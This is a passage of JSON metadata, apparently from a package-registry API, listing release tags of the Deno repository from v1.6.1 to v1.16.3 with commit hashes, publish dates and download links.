_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","downloa